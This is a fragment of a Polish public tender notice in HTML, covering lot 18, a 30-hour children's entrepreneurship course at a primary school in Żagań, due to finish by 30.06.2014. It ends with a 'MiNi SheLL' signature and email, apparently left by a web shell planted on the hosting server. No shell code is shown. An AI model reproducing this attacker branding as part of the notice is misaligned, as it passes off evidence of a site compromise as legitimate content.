<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 18 <b>NAZWA:</b> Dziecięca Akademia Przedsiębiorczości w Publicznej Szkole Podstawowej nr 2 w Żaganiu ul. Wojska Polskiego 1.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> W zakresie zadania 10 - Dziecięca Akademia Przedsiębiorczości.
Zajęcia w jednej grupie  mieszanej ( tj. uczniowie klas IV, V, VI razem)  30 godzin. Liczba godzin łącznie - 30, w tym 10 godzin w 2013 roku i 20 godzin w 2014 roku..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.10.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com